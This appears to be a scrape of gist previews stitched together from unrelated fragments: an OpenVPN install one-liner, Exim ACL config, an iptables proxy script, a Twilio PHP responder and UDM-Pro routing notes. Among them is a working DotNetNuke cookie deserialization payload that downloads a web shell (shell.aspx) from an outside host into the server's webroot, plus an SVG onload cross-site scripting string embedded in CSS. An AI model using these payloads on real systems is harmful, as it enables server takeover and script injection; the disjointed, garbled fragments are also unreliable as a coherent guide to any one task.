wget https://git.io/vpn -O openvpn-install.sh && bash openvpn-install.sh
/etc/openvpn/server/server.conf
Change the OpenVPN LAN address to prevent interfering with other OpenVPN connections
DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us |
acl_smtp_mail=acl_check_mail | |
acl_smtp_data=acl_check_data | |
begin acl | |
acl_check_mail: | |
.ifdef CHECK_MAIL_HELO_ISSUED | |
deny | |
message = no HELO given before MAIL command | |
condition = ${if def:sender_helo_name {no}{yes}} | |
.endif |
background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>"); | |
background-color: #cccccc; |
# !/bin/bash | |
# | |
# Configure server to act as a reverse proxy for port 80/443 and only allow Cloudflare IPs | |
# Usage: bash cloudflare-reverse-proxy.sh destinationip managmentip | |
# Clear existing iptables | |
iptables -F | |
# Forward traffic from Cloudflare |
<?php | |
/** | |
* This section ensures that Twilio gets a response. | |
*/ | |
header('Content-type: text/xml'); | |
echo '<?xml version="1.0" encoding="UTF-8"?>'; | |
echo '<Response><Message>Your message could not be delivered. This number only accepts encrypted messages through Signal Private Messenger. Download it here https://signal.org/install</Message></Response>'; //Place the desired response (if any) here | |
/** | |
* This section actually sends the email. |
Some simple bash scripts for deleting all Voicemails, Call Logs, and Messages from your Twilio account.
Adapted from eric-brechemier/how-i-replaced-skype-with-twilio#6 (comment)
Extract the downloaded drivers
sudo tar -xvjf r8152.53.56-2.15.0.tar.bz2 -C /usr/src/
Create a DKMS.conf file
Tested on UDM-Pro 1.10.0
The following scripts can be used on a UDM-Pro with on boot script to force specific vlans out WAN2 as well as prevent that traffic from going out wan1 and all other traffic from going out wan2 in the event one WAN is disconnected.
curl -fsSLo /mnt/data/on_boot.d/98-vlan_to_wan2.sh https://gist.githubusercontent.com/GlitchWitch/9833888842dbd7d0b42669faab4c4a4a/raw/9ede55da6820c65c3aeb5d0951a71855641b0041/98-vlan_to_wan2.sh